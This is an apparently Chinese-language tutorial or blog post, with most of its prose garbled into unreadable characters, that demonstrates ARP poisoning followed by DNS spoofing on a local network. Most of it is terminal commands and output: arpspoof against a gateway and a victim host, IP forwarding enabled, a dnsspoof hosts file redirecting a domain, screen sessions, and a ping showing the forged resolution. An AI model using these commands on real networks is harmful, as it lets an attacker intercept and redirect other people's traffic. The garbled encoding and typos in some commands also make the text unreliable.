ͨDNSƭͻARPǽļ
DNSƭܷɹɣ ~# netstat -r Kernel IP routing table Destination Gateway Genmask Flags MSS Window irtt Iface 5.5.5.0 * 255.255.255.0 U 0 0 0 eth0 link-local * 255.255.0.0 U 0 0 0 eth0 default 1.1.1.2 0.0.0.0 UG 0 0 0 eth0 ~# a-
ȲDNSƭܷɹɣ
~# netstat -r
Kernel IP routing table
Destination Gateway Genmask Flags MSS Windowirtt Iface
5.5.5.0 * 255.255.255.0 U 0 0 0 eth0
link-local * 255.255.0.0 U 0 0 0 eth0
default 1.1.1.2 0.0.0.0 UG 0 0 0 eth0
~# arpspoof 1.1.1.2 -t 1.1.1.5 /ն1
~# arpspoof 1.1.1.5-t 1.1.1.2 /ն2
~# echo 1 > /proc/sys/net/ipv4/ip_forward /ת
arpǽжɹ
ƴ
ƭdns ͣķ~~~
~# cat baidu
1.1.1.4www.political-security.com/1.1.1.4
~# dnsspoof -f baidu host 1.1.1.1.5 and udpport 53
~#cat send /ͣķ~~~
arpspoof 1.1.1.5 -t 1.1.1.2
arpspoof 1.1.1.2 -t 1.1.1.5
~# screen ./send
+Stopped screen ./send
~#screen ./send
+Stopped screen ./send /ξͿ
~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~
~#screen -ls/½
There are screens on:
3754.pts-7.TzSec Team (11/01/2012 12:21:47 AM) (Detached)
3750.pts-7.TzSec Team (11/01/2012 12:21:46 AM) (Detached)
3746.pts-7.TzSec Team (11/01/2012 12:21:44 AM) (Detached)
3742.pts-7.TzSec Team (11/01/2012 12:21:41 AM) (Detached)
3722.pts-4.TzSec Team (11/01/2012 12:21:21 AM) (Attached)
6 Sockets in /var/run/screen/S-root.
~#
תwin
ping www.political-security.com
Pinging www.political-security.com with 32 bytes of data:
Reply from 1.1.1.4: bytes=32 time<1ms TTL=64
Reply from 1.1.1.4: bytes=32 time<1ms TTL=64
ƴ
360Ӧαװ·ԴͿ
ҳ:
[1]